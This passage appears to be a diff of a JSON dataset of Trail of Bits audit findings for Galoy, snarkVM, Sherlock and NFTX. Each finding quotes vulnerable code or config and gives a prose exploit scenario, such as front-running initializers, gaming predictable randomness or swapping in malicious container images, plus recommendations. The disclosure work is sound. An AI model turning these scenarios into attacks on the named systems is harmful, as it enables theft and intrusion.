PR_SET_MM_ENV_END ags enabled to change the memory address of the content the le is rendered from. 12 const jwtSecret = process.env.JWT_SECRET Figure 19.2: src/config/process.ts#12 Certain initialization commands take a password as a command-line argument (gures 19.3 and 19.4). If an attacker gained access to a user account on a system running the script, the attacker would also gain access to any password passed as a command-line argument. 65 66 command : [ '/bin/sh' ] args : 67 - '-c' 68 - | 69 70 71 72 73 if [ ! -f /root/.lnd/data/chain/bitcoin/${NETWORK}/admin.macaroon ]; then while ! test -f /root/.lnd/tls.cert; do sleep 1; done apk update; apk add expect /home/alpine/walletInit.exp ${NETWORK} $LND_PASS fi Figure 19.3: charts/lnd/templates/statefulset.yaml#6573 55 set PASSWORD [lindex $argv 1]; Figure 19.4: charts/lnd/templates/wallet-init-configmap.yaml#55 In Linux, all users can inspect other users commands and their arguments. A user can enable the proc lesystem's hidepid=2 gid=0 mount options to hide metadata about spawned processes from users who are not members of the specied group. However, in many Linux distributions, those options are not enabled by default. Recommendations Short term, take the following actions: Remove the default encryption keys and avoid using any one default key across installs. The user should be prompted to provide a key when deploying the Galoy application, or the application should generate a key using known-good cryptographically secure methods and provide it to the user for safekeeping. Avoid storing encryption keys in conguration les. Conguration les are often broadly readable or rendered as such accidentally. Long term, ensure that keys, passwords, and other sensitive data are never stored in plaintext in the lesystem, and avoid providing default values for that data. Also take the following steps: Document the risks of providing sensitive values through environment variables. Encourage developers to pass sensitive values through standard input or to use a launcher that can fetch them from a service like HashiCorp Vault. Allow developers to pass in those values from a conguration le, but document the fact that the conguration le should not be saved in backups, and provide a warning if the le has overly broad permissions when the program is started.", + "title": "28. Potential panic in encryption/decryption circuit generation ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The decrypt_with_randomizers and encrypt_with_randomizers functions do not check the length of the randomizers argument against the length of the underlying ciphertext and plaintext, respectively. This can cause a panic in the zip_eq call. Existing calls to the function seem safe, but since it is a public function, the lengths of its underlying values should be checked to prevent panics in future code. pub ( crate ) fn decrypt_with_randomizers (& self , randomizers: & [Field]) -> Plaintext { // Decrypt the ciphertext. Plaintext::from_fields( & self .iter() .zip_eq(randomizers) Figure 28.1: circuit/program/src/data/ciphertext/decrypt.rs#L31-L36 Recommendations Short term, add a check to ensure that the length of the underlying plaintext/ciphertext matches the length of the randomizer values.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "20. Third-party container images are not version pinned ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The continuous integration (CI) pipeline and Helm charts reference third-party components such as Docker registry images by named tags (or by no tag at all). Registry tags are not immutable; if an attacker compromised an image publishers account, the pipeline or Kubernetes cluster could be provided a malicious container image. 87 - name : build-chain-dl-image 88 89 90 91 92 93 94 95 96 97 98 serial : true plan : - { get : chain-dl-image-def , trigger : true } - task : build privileged : true config : platform : linux image_resource : type : registry-image source : repository : vito/oci-build-task Figure 20.1: A third-party image referenced without an explicit tag ( ci/pipeline.yml#8798 ) 270 resource_types : 271 - name : terraform 272 273 274 275 type : docker-image source : repository : ljfranklin/terraform-resource tag : latest Figure 20.2: An image referenced by the latest tag ( ci/pipeline.yml#270275 ) Exploit Scenario An attacker gains access to a Docker Hub account hosting an image used in the CI pipeline. The attacker then tags a malicious container image and pushes it to Docker Hub. The CI pipeline retrieves the tagged malicious image and uses it to execute tasks. Recommendations Short term, refer to Docker images by SHA-256 digests to prevent the use of an incorrect or modied image. Long term, integrate automated tools such as Checkov into the development workow to detect similar issues in the codebase.", + "title": "29. Variable timing of certain cryptographic functions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", + "body": "The Pedersen commitment code computes the masking element [r]h by ltering out powers of h not indicated by the randomizer r and adding the remaining values. However, the timing of this function leaks information about the randomizer value. In particular, it can reveal the Hamming weight (or approximate Hamming weight) of the randomizer. If the randomizer r is a 256-bit value, but timing indicates that the randomizer has a Hamming weight of 100 (for instance), then the possible set of randomizers has only about 2 243 elements. This compromises the information-theoretic security of the hiding property of the Pedersen commitment. randomizer.to_bits_le().iter().zip_eq(&* self .random_base_window).filter(|(bit, _)| **bit).for_each( |(_, base)| { output += base; }, ); Figure 29.1: console/algorithms/src/pedersen/commit_uncompressed.rs#L27-L33 Recommendations Short term, consider switching to a constant-time algorithm for computing the masking value.", "labels": [ "Trail of Bits", - "Severity: Undetermined", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "21. Compute instances do not leverage Shielded VM features ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The bastion host denition does not enable all of Google Clouds Shielded VM (virtual machine) features for Compute Engine VM instances. These features provide veriable integrity of VM instances and assurance that VM instances have not been compromised by boot- or kernel-level malware or rootkits. Three features provide this veriable integrity: Secure Boot, virtual trusted platform module (vTPM)-enabled Measured Boot, and integrity monitoring. Google also oers Shielded GKE nodes, which are built on top of Shielded VMs and provide strong veriable node identity and integrity to increase the security of GKE nodes. The node pool denition does enable this feature but disables Secure Boot checks on the node instances. 168 169 170 shielded_instance_config { enable_secure_boot = false enable_integrity_monitoring = true 171 } Figure 21.1: Secure Boot is disabled. ( modules/platform/gcp/kube.tf#168171 ) Exploit Scenario The bastion host is compromised, and persistent kernel-level malware is installed. Because the bastion host is still operational, the malware remains undetected for an extended period. Recommendations Short term, enable these security features to increase the security and trustworthiness of the infrastructure. Long term, integrate automated analysis tools such as tfsec into the development workow to detect other areas of improvement in the solution. References What is Shielded VM? , Compute Engine documentation Using GKE Shielded Nodes, GKE documentation", + "title": "1. Solidity compiler optimizations can be problematic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "Sherlock has enabled optional compiler optimizations in Solidity. There have been several optimization bugs with security implications. Moreover, optimizations are actively being developed. Solidity compiler optimizations are disabled by default, and it is unclear how many contracts in the wild actually use them. Therefore, it is unclear how well they are being tested and exercised. High-severity security issues due to optimization bugs have occurred in the past. A high-severity bug in the emscripten-generated solc-js compiler used by True and Remix persisted until late 2018. The x for this bug was not reported in the Solidity CHANGELOG. Another high-severity optimization bug resulting in incorrect bit shift results was patched in Solidity 0.5.6. More recently, another bug due to the incorrect caching of keccak256 was reported. A compiler audit of Solidity from November 2018 concluded that the optional optimizations may not be safe. It is likely that there are latent bugs related to optimization and that new bugs will be introduced due to future optimizations. Exploit Scenario A latent or future bug in Solidity compiler optimizationsor in the Emscripten transpilation to solc-jscauses a security vulnerability in the Sherlock contracts. Recommendations Short term, measure the gas savings from optimizations and carefully weigh them against the possibility of an optimization-related bug. Long term, monitor the development and adoption of Solidity compiler optimizations to assess their maturity.", "labels": [ "Trail of Bits", "Severity: Undetermined", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "22. Excessive container permissions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "Kubernetes containers launch processes under user and group IDs corresponding to users and groups on the host system. Container processes that are running as root usually have more permissions than their workload requires. If such a process were compromised, the permissions would enable the attacker to perform further attacks against the container or host. Kubernetes provides several ways to further limit these permissions, such as disabling the allowPrivilegeEscalation ag to ensure that a child process of a container cannot gain more privileges than its parent, dropping all Linux capabilities, and enforcing Seccomp and AppArmor proles. We found several instances of containers run as root, with allowPrivilegeEscalation enabled by omission (gure 22.1) or with low user IDs that overlap with host user IDs (gure 22.2). In some of the containers, Linux capabilities were not dropped (gure 22.2), and neither Seccomp nor AppArmor proles were enabled. 24 containers : 25 - name : auth-backend 26 27 28 29 30 image : \"{{ .Values.image.repository }}@{{ .Values.image.digest }}\" ports : - containerPort : 3000 env : - (...) Figure 22.1: Without a securityContext eld, commands will run as root and a container will allow privilege escalation by default. ( charts/galoy-auth/charts/auth-backend/templates/deployment.yaml#2430 ) 38 39 40 41 42 43 44 45 securityContext : # capabilities: # drop: # - ALL readOnlyRootFilesystem : true runAsNonRoot : true runAsUser : 1000 runAsGroup : 3000 Figure 22.2: User ID 1000 is typically used by the rst non-system user account. ( charts/bitcoind/values.yaml#3845 ) Exploit Scenario An attacker is able to trigger remote code execution in the Web Wallet application. The attacker then leverages the lax permissions to exploit CVE-2022-0185, a buer overow vulnerability in the Linux kernel that allows her to obtain root privileges and escape the Kubernetes pod. The attacker then gains the ability to execute code on the host system. Recommendations Short term, review and adjust the securityContext conguration of all charts used by the Galoy system. Run pods as non-root users with high user IDs that will not overlap with host user IDs. Drop all unnecessary capabilities, and enable security policy enforcement when possible. Long term, integrate automated tools such as Checkov into the CI pipeline to detect areas of improvement in the solution. Additionally, review the Docker recommendations outlined in appendix E . References Kubernetes container escape using Linux Kernel exploit , CrowdStrike 10 Kubernetes Security Context settings you should understand, snyk", + "title": "2. Certain functions lack zero address checks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "Certain functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. For example, the AaveV2Strategy contracts constructor function does not validate the aaveLmReceiver, which is the address that receives Aave rewards on calls to AaveV2Strategy.claimRewards. 39 40 41 42 43 44 45 46 47 } constructor(IAToken _aWant, address _aaveLmReceiver) { aWant = _aWant; // This gets the underlying token associated with aUSDC (USDC) want = IERC20(_aWant.UNDERLYING_ASSET_ADDRESS()); // Gets the specific rewards controller for this token type aaveIncentivesController = _aWant.getIncentivesController(); aaveLmReceiver = _aaveLmReceiver; Figure 2.1: managers/AaveV2Strategy.sol:39-47 If the aaveLmReceiver variable is set to the address zero, the Aave contract will revert with INVALID_TO_ADDRESS. This prevents any Aave rewards from being claimed for the designated token. The following functions are missing zero address checks: Manager.setSherlockCoreAddress AaveV2Strategy.sweep SherDistributionManager.sweep SherlockProtocolManager.sweep Sherlock.constructor Exploit Scenario Bob deploys AaveV2Strategy with aaveLmReceiver set to the zero address. All calls to claimRewards revert. Recommendations Short term, add zero address checks on all function arguments to ensure that users cannot accidentally set incorrect values. Long term, use Slither, which will catch functions that do not have zero address checks.", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: Low" + "Difficulty: High" ] }, { - "title": "23. Unsigned and unversioned Grafana BigQuery Datasource plugin ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Galoy.pdf", - "body": "The BigQuery Datasource plugin is installed as part of the Grafana conguration found in the Helm charts. The plugin, which is unsigned, is pulled directly from the master branch of the doitintl/bigquery-grafana GitHub repository, and signature checks for the plugin are disabled. Grafana advises against running unsigned plugins. 10 11 plugins : - https://github.com/doitintl/bigquery-grafana/archive/master.zip ;doit-bigquery-dataso urce 12 13 14 15 grafana.ini : plugins : allow_loading_unsigned_plugins : \"doitintl-bigquery-datasource\" Figure 23.1: The plugin is downloaded directly from the GitHub repository, and signature checks are disabled. ( charts/monitoring/values.yaml#1015 ) Exploit Scenario An attacker compromises the doitintl/bigquery-grafana repository and pushes malicious code to the master branch. When Grafana is set up, it downloads the plugin code from the master branch. Because unsigned plugins are allowed, Grafana directly loads the malicious plugin. Recommendations Short term, install the BigQuery Datasource plugin from a signed source such as the Grafana catalog, and disallow the loading of any unsigned plugins. Long term, review the vendor recommendations when conguring new software and avoid disabling security features such as signature checks. When referencing external code and software releases, do so by immutable hash digests instead of named tags or branches to prevent unintended modications. References Plugin Signatures , Grafana Labs 24. Insu\u0000cient validation of JWTs used for GraphQL subscriptions Severity: Low Diculty: Low Type: Authentication Finding ID: TOB-GALOY-24 Target: galoy/src/servers/graphql-server.ts", + "title": "3. updateYieldStrategy could leave funds in the old strategy ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "The updateYieldStrategy function sets a new yield strategy manager contract without calling yieldStrategy.withdrawAll() on the old strategy, potentially leaving funds in it. 257 // Sets a new yield strategy manager contract 258 /// @notice Update yield strategy 259 /// @param _yieldStrategy News address of the strategy 260 /// @dev try a yieldStrategyWithdrawAll() on old, ignore failure 261 function updateYieldStrategy(IStrategyManager _yieldStrategy) external override onlyOwner { 262 263 264 265 266 yieldStrategy = _yieldStrategy; 267 } if (address(_yieldStrategy) == address(0)) revert ZeroArgument(); if (yieldStrategy == _yieldStrategy) revert InvalidArgument(); emit YieldStrategyUpdated(yieldStrategy, _yieldStrategy); Figure 3.1: contracts/Sherlock.sol:257-267 Even though one could re-add the old strategy to recover the funds, this issue could cause stakers and the protocols insured by Sherlock to lose trust in the system. This issue has a signicant impact on the result of totalTokenBalanceStakers, which is used when calculating the shares in initialStake. totalTokenBalanceStakers uses the balance of the yield strategy. If the balance is missing the funds that should have been withdrawn from a previous strategy, the result will be incorrect. return 151 function totalTokenBalanceStakers() public view override returns (uint256) { 152 153 token.balanceOf(address(this)) + 154 155 sherlockProtocolManager.claimablePremiums(); 156 } yieldStrategy.balanceOf() + Figure 3.2: contracts/Sherlock.sol:151-156 uint256 _amount, uint256 _period, address _receiver 483 function initialStake( 484 485 486 487 ) external override whenNotPaused returns (uint256 _id, uint256 _sher) { ... 501 502 stakeShares_ = (_amount * totalStakeShares_) / (totalTokenBalanceStakers() - _amount); 503 // If this is the first stake ever, we just mint stake shares equal to the amount of USDC staked 504 else stakeShares_ = _amount; if (totalStakeShares_ != 0) Figure 3.3: contracts/Sherlock.sol:483-504 Exploit Scenario Bob, the owner of the Sherlock contract, calls updateYieldStrategy with a new strategy. Eve calls initialStake and receives more shares than she is due because totalTokenBalanceStakers returns a signicantly lower balance than it should. Bob notices the missing funds, calls updateYieldStrategy with the old strategy and then yieldStrategy.WithdrawAll to recover the funds, and switches back to the new strategy. Eves shares now have notably more value. Recommendations Short term, in updateYieldStrategy, add a call to yieldStrategy.withdrawAll() on the old strategy. Long term, when designing systems that store funds, use extensive unit testing and property-based testing to ensure that funds cannot become stuck.", "labels": [ "Trail of Bits", "Severity: High", - "Difficulty: Low" - ] - }, - { - "title": "1. Reliance on third-party library for deployment ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "Due to the use of the delegatecall proxy pattern, some NFTX contracts cannot be initialized with their own constructors; instead, they have initializer functions. These functions can be front-run, allowing an attacker to initialize contracts incorrectly. function __NFTXInventoryStaking_init(address _nftxVaultFactory) external virtual override initializer { __Ownable_init(); nftxVaultFactory = INFTXVaultFactory(_nftxVaultFactory); address xTokenImpl = address(new XTokenUpgradeable()); __UpgradeableBeacon__init(xTokenImpl); } Figure 1.1: The initializer function in NFTXInventoryStaking.sol:37-42 The following contracts have initializer functions that can be front-run: NFTXInventoryStaking NFTXVaultFactoryUpgradeable NFTXEligibilityManager NFTXLPStaking NFTXSimpleFeeDistributor The NFTX team relies on hardhat-upgrades, a library that oers a series of safety checks for use with certain OpenZeppelin proxy reference implementations to aid in the proxy deployment process. It is important that the NFTX team become familiar with how the hardhat-upgrades library works internally and with the caveats it might have. For example, some proxy patterns like the beacon pattern are not yet supported by the library. Exploit Scenario Bob uses the library incorrectly when deploying a new contract: he calls upgradeTo() and then uses the fallback function to initialize the contract. Eve front-runs the call to the initialization function and initializes the contract with her own address, which results in an incorrect initialization and Eves control over the contract. Recommendations Short term, document the protocols use of the library and the proxy types it supports. Long term, use a factory pattern instead of the initializer functions to prevent front-running of the initializer functions.", - "labels": [ - "Trail of Bits", - "Severity: Informational", "Difficulty: High" ] }, { - "title": "2. Missing validation of proxy admin indices ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "Multiple functions of the ProxyController contract take an index as an input. The index determines which proxy (managed by the controller) is being targeted. However, the index is never validated, which means that the function will be executed even if the index is out of bounds with respect to the number of proxies managed by the contract (in this case, ve). function changeProxyAdmin(uint256 index, address newAdmin) public onlyOwner { } if (index == 0) { vaultFactoryProxy.changeAdmin(newAdmin); } else if (index == 1) { eligManagerProxy.changeAdmin(newAdmin); } else if (index == 2) { stakingProviderProxy.changeAdmin(newAdmin); } else if (index == 3) { stakingProxy.changeAdmin(newAdmin); } else if (index == 4) { feeDistribProxy.changeAdmin(newAdmin); } emit ProxyAdminChanged(index, newAdmin); Figure 2.1: The changeProxyAdmin function in ProxyController.sol:79-95 In the changeProxyAdmin function, a ProxyAdminChanged event is emitted even if the supplied index is out of bounds (gure 2.1). Other ProxyController functions return the zero address if the index is out of bounds. For example, getAdmin() should return the address of the targeted proxys admin. If getAdmin() returns the zero address, the caller cannot know whether she supplied the wrong index or whether the targeted proxy simply has no admin. function getAdmin(uint256 index) public view returns (address admin) { if (index == 0) { return vaultFactoryProxy.admin(); } else if (index == 1) { return eligManagerProxy.admin(); } else if (index == 2) { return stakingProviderProxy.admin(); } else if (index == 3) { return stakingProxy.admin(); } else if (index == 4) { return feeDistribProxy.admin(); } } Figure 2.2: The getAdmin function in ProxyController.sol:38-50 Exploit Scenario A contract relying on the ProxyController contract calls one of the view functions, like getAdmin(), with the wrong index. The function is executed normally and implicitly returns zero, leading to unexpected behavior. Recommendations Short term, document this behavior so that clients are aware of it and are able to include safeguards to prevent unanticipated behavior. Long term, consider adding an index check to the aected functions so that they revert if they receive an out-of-bounds index.", + "title": "4. Pausing and unpausing the system may not be possible when removing or replacing connected contracts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "The Sherlock contract allows all of the connected contracts to be paused or unpaused at the same time. However, if the sherDistributionManager contract is removed, or if any of the connected contracts are replaced when the system is paused, it might not be possible to pause or unpause the system. function removeSherDistributionManager() external override onlyOwner { if (address(sherDistributionManager) == address(0)) revert InvalidConditions(); emit SherDistributionManagerUpdated( sherDistributionManager, ISherDistributionManager(address(0)) ); delete sherDistributionManager; 206 207 208 209 210 211 212 213 214 } Figure 4.1: contracts/Sherlock.sol:206-214 Of all the connected contracts, the only one that can be removed is the sherDistributionManager contract. On the other hand, all of the connected contracts can be replaced through an update function. function pause() external onlyOwner { _pause(); yieldStrategy.pause(); sherDistributionManager.pause(); sherlockProtocolManager.pause(); sherlockClaimManager.pause(); 302 303 304 305 306 307 308 } 309 310 311 /// @notice Unpause external functions in all contracts function unpause() external onlyOwner { 312 313 314 315 316 317 } _unpause(); yieldStrategy.unpause(); sherDistributionManager.unpause(); sherlockProtocolManager.unpause(); sherlockClaimManager.unpause(); Figure 4.2: contracts/Sherlock.sol:302-317 If the sherDistributionManager contract is removed, a call to Sherlock.pause will revert, as it is attempting to call the zero address. If sherDistributionManager is removed while the system is paused, then a call to Sherlock.unpause will revert for the same reason. If any of the contracts is replaced while the system is paused, the replaced contract will be in an unpaused state while the other contracts are still paused. As a result, a call to Sherlock.unpause will revert, as it is attempting to unpause an already unpaused contract. Exploit Scenario Bob, the owner of the Sherlock contract, pauses the system to replace the sherlockProtocolManager contract, which contains a bug. Bob deploys a new sherlockProtocolManager contract and calls updateSherlockProtocolManager to set the new address in the Sherlock contract. To unpause the system, Bob calls Sherlock.unpause, which reverts because sherlockProtocolManager is already unpaused. Recommendations Short term, add conditional checks to the Sherlock.pause and Sherlock.unpause functions to check that a contract is either paused or unpaused, as expected, before attempting to update its state. For sherDistributionManager, the check should verify that the contract to be paused or unpaused is not the zero address. Long term, for pieces of code that depend on the states of multiple contracts, implement unit tests that cover each possible combination of contract states.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Medium" ] }, { - "title": "3. Random token withdrawals can be gamed ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "The algorithm used to randomly select a token for withdrawal from a vault is deterministic and predictable. function getRandomTokenIdFromVault() internal virtual returns (uint256) { uint256 randomIndex = uint256( keccak256( abi.encodePacked( blockhash(block.number - 1), randNonce, block.coinbase, block.difficulty, block.timestamp ) ) ) % holdings.length(); ++randNonce; return holdings.at(randomIndex); } Figure 3.1: The getRandomTokenIdFromVault function in NFTXVaultUpgradable.sol:531-545 All the elements used to calculate randomIndex are known to the caller (gure 3.1). Therefore, a contract calling this function can predict the resulting token before choosing to execute the withdrawal. This nding is of high diculty because NFTXs vault economics incentivizes users to deposit tokens of equal value. Moreover, the cost of deploying a custom exploit contract will likely outweigh the fee savings of choosing a token at random for withdrawal. Exploit Scenario Alice wishes to withdraw a specic token from a vault but wants to pay the lower random redemption fee rather than the higher target redemption fee. She deploys a contract that checks whether the randomly chosen token is her target and, if so, automatically executes the random withdrawal. Recommendations Short term, document the risks described in this nding so that clients are aware of them. Long term, consider removing all randomness from NFTX.", + "title": "5. SHER reward calculation uses confusing six-decimal SHER reward rate ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "The reward calculation in calcReward uses a six-decimal SHER reward rate value. This might confuse readers and developers of the contracts because the SHER token has 18 decimals, and the calculated reward will also have 18 decimals. Also, this value does not allow the SHER reward rate to be set below 0.000001000000000000 SHER. function calcReward( 89 90 91 92 93 ) public view override returns (uint256 _sher) { uint256 _tvl, uint256 _amount, uint256 _period 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 [..] // If there are some max rewards available... if (maxRewardsAvailable != 0) { // And if the entire stake is still within the maxRewardsAvailable amount if (_amount <= maxRewardsAvailable) { // Then the entire stake amount should accrue max SHER rewards return (_amount * maxRewardsRate * _period) * DECIMALS; } else { // Otherwise, the stake takes all the maxRewardsAvailable left // We add the maxRewardsAvailable amount to the TVL (now _tvl _tvl += maxRewardsAvailable; // We subtract the amount of the stake that received max rewards _amount -= maxRewardsAvailable; // We accrue the max rewards available at the max rewards // This could be: $20M of maxRewardsAvailable which gets // Calculation continues after this _sher += (maxRewardsAvailable * maxRewardsRate * _period) * DECIMALS; } } // If there are SHER rewards still available if (slopeRewardsAvailable != 0) { _sher += (((zeroRewardsStartTVL - position) * _amount * maxRewardsRate * _period) / (zeroRewardsStartTVL - maxRewardsEndTVL)) * DECIMALS; 144 145 146 147 148 149 } } Figure 5.1: contracts/managers/SherDistributionManager.sol:89-149 In the reward calculation, the 6-decimal maxRewardsRate is rst multiplied by _amount and _period, resulting in a 12-decimal intermediate product. To output a nal 18-decimal product, this 12-decimal product is multiplied by DECIMALS to add 6 decimals. Although this leads to a correct result, it would be clearer to use an 18-decimal value for maxRewardsRate and to divide by DECIMALS at the end of the calculation. // using 6 decimal maxRewardsRate (10e6 * 1e6 * 10) * 1e6 = 100e18 = 100 SHER // using 18 decimal maxRewardsRate (10e6 * 1e18 * 10) / 1e6 = 100e18 = 100 SHER Figure 5.2: Comparison of a 6-decimal and an 18-decimal maxRewardsRate Exploit Scenario Bob, a developer of the Sherlock protocol, writes a new version of the SherDistributionManager contract that changes the reward calculation. He mistakenly assumes that the SHER maxRewardsRate has 18 decimals and updates the calculation incorrectly. As a result, the newly calculated reward is incorrect. Recommendations Short term, use an 18-decimal value for maxRewardsRate and divide by DECIMALS instead of multiplying. Long term, when implementing calculations that use the rate of a given token, strive to use a rate variable with the same number of decimals as the token. This will prevent any confusion with regard to decimals, which might lead to introducing precision bugs when updating the contracts.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -4052,59 +6750,49 @@ ] }, { - "title": "4. Duplicate receivers allowed by addReceiver() ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "The NFTXSimpleFeeDistributor contract is in charge of protocol fee distribution. To facilitate the fee distribution process, it allows the contract owner (the NFTX DAO) to manage a list of fee receivers. To add a new fee receiver to the contract, the owner calls the addReceiver() function. function addReceiver( uint256 _allocPoint, address _receiver, bool _isContract ) external override virtual onlyOwner { _addReceiver(_allocPoint, _receiver, _isContract); } Figure 4.1: The addReceiver() function in NFTXSimpleFeeDistributor This function in turn executes the internal logic that pushes a new receiver to the receiver list. function _addReceiver( uint256 _allocPoint, address _receiver, bool _isContract ) internal virtual { FeeReceiver memory _feeReceiver = FeeReceiver(_allocPoint, _receiver, _isContract); feeReceivers.push(_feeReceiver); allocTotal += _allocPoint; emit AddFeeReceiver(_receiver, _allocPoint); } Figure 4.2: The _addReceiver() function in NFTXSimpleFeeDistributor However, the function does not check whether the receiver is already in the list. Without this check, receivers can be accidentally added multiple times to the list, which would increase the amount of fees they receive. The issue is of high diculty because the addReceiver() function is owner-protected and, as indicated by the NFTX team, the owner is the NFTX DAO. Because the DAO itself was out of scope for this review, we do not know what the process to become a receiver looks like. We assume that a DAO proposal has to be created and a certain quorum has to be met for it to be executed. Exploit Scenario A proposal is created to add a new receiver to the fee distributor contract. The receiver address was already added, but the DAO members are not aware of this. The proposal passes, and the receiver is added. The receiver gains more fees than he is entitled to. Recommendations Short term, document this behavior so that the NFTX DAO is aware of it and performs the adequate checks before adding a new receiver. Long term, consider adding a duplicate check to the _addReceiver() function.", + "title": "6. A claim cannot be paid out or escalated if the protocol agent changes after the claim has been initialized ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "The escalate and payoutClaim functions can be called only by the protocol agent that started the claim. Therefore, if the protocol agent role is reassigned after a claim is started, the new protocol agent will be unable to call these functions and complete the claim. function escalate(uint256 _claimID, uint256 _amount) external override nonReentrant whenNotPaused 388 389 390 391 392 393 { 394 395 396 397 398 399 400 401 402 403 if (_amount < BOND) revert InvalidArgument(); // Gets the internal ID of the claim bytes32 claimIdentifier = publicToInternalID[_claimID]; if (claimIdentifier == bytes32(0)) revert InvalidArgument(); // Retrieves the claim struct Claim storage claim = claims_[claimIdentifier]; // Requires the caller to be the protocol agent if (msg.sender != claim.initiator) revert InvalidSender(); Figure 6.1: contracts/managers/SherlockClaimManager.sol:388-403 Due to this scheme, care should be taken when updating the protocol agent. That is, the protocol agent should not be reassigned if there is an existing claim. However, if the protocol agent is changed when there is an existing claim, the protocol agent role could be transferred back to the original protocol agent to complete the claim. Exploit Scenario Alice is the protocol agent and starts a claim. Alice transfers the protocol agent role to Bob. The claim is approved by SPCC and can be paid out. Bob calls payoutClaim, but the transaction reverts. Recommendations Short term, update the comment in the escalate and payoutClaim functions to state that the caller needs to be the protocol agent that started the claim, and clearly describe this requirement in the protocol agent documentation. Alternatively, update the check to verify that msg.sender is the current protocol agent rather than specically the protocol agent who initiated the claim. Long term, review and document the eects of the reassignment of privileged roles on the systems state transitions. Such a review will help uncover cases in which the reassignment of privileged roles causes issues and possibly a denial of service to (part of) the system.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Medium", "Difficulty: High" ] }, { - "title": "5. OpenZeppelin vulnerability can break initialization ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "NFTX extensively uses OpenZeppelin v3.4.1. A bug was recently discovered in all OpenZeppelin versions prior to v4.4.1 that aects initializer functions invoked separately during contract creation: the bug causes the contract initialization modier to fail to prevent reentrancy to the initializers (see CVE-2021-46320). Currently, no external calls to untrusted code are made during contract initialization. However, if the NFTX team were to add a new feature that requires such calls to be made, it would have to add the necessary safeguards to prevent reentrancy. Exploit Scenario An NFTX contract initialization function makes a call to an external contract that calls back to the initializer with dierent arguments. The faulty OpenZeppelin initializer modier fails to prevent this reentrancy. Recommendations Short term, upgrade OpenZeppelin to v4.4.1 or newer. Long term, integrate a dependency checking tool like Dependabot into the NFTX CI process.", + "title": "7. Missing input validation in setMinActiveBalance could cause a confusing event to be emitted ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Sherlockv2.pdf", + "body": "The setMinActiveBalance functions input validation is incomplete: it should check that the minActiveBalance has not been set to its existing value, but this check is missing. Additionally, if the minActiveBalance is set to its existing value, the emitted MinBalance event will indicate that the old and new values are identical. This could confuse systems monitoring the contract that expect this event to be emitted only when the minActiveBalance changes. function setMinActiveBalance(uint256 _minActiveBalance) external override onlyOwner { // Can't set a value that is too high to be reasonable require(_minActiveBalance < MIN_BALANCE_SANITY_CEILING, 'INSANE'); emit MinBalance(minActiveBalance, _minActiveBalance); minActiveBalance = _minActiveBalance; 422 423 424 425 426 427 428 } Figure 7.1: contracts/managers/SherlockProtocolManager.sol:422-428 Exploit Scenario An o-chain monitoring system controlled by the Sherlock protocol is listening for events that indicate that a contract conguration value has changed. When such events are detected, the monitoring system sends an email to the admins of the Sherlock protocol. Alice, a contract owner, calls setMinActiveBalance with the existing minActiveBalance as input. The o-chain monitoring system detects the emitted event and noties the Sherlock protocol admins. The Sherlock protocol admins are confused since the value did not change. Recommendations Short term, add input validation that causes setMinActiveBalance to revert if the proposed minActiveBalance value equals the current value. Long term, document and test the expected behavior of all the systems events. Consider using a blockchain-monitoring system to track any suspicious behavior in the contracts.", "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Low" - ] - }, - { - "title": "6. Potentially excessive gas fees imposed on users for protocol fee distribution ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "Whenever a user executes a minting, redeeming, or swapping operation on a vault, a fee is charged to the user and is sent to the NFXTSimpleFeeDistributor contract for distribution. function _chargeAndDistributeFees(address user, uint256 amount) internal virtual { // Do not charge fees if the zap contract is calling // Added in v1.0.3. Changed to mapping in v1.0.5. INFTXVaultFactory _vaultFactory = vaultFactory; if (_vaultFactory.excludedFromFees(msg.sender)) { return; } // Mint fees directly to the distributor and distribute. if (amount > 0) { address feeDistributor = _vaultFactory.feeDistributor(); // Changed to a _transfer() in v1.0.3. _transfer(user, feeDistributor, amount); INFTXFeeDistributor(feeDistributor).distribute(vaultId); } } Figure 6.1: The _chargeAndDistributeFees() function in NFTXVaultUpgradeable.sol After the fee is sent to the NFXTSimpleFeeDistributor contract, the distribute() function is then called to distribute all accrued fees. function distribute(uint256 vaultId) external override virtual nonReentrant { require(nftxVaultFactory != address(0)); address _vault = INFTXVaultFactory(nftxVaultFactory).vault(vaultId); uint256 tokenBalance = 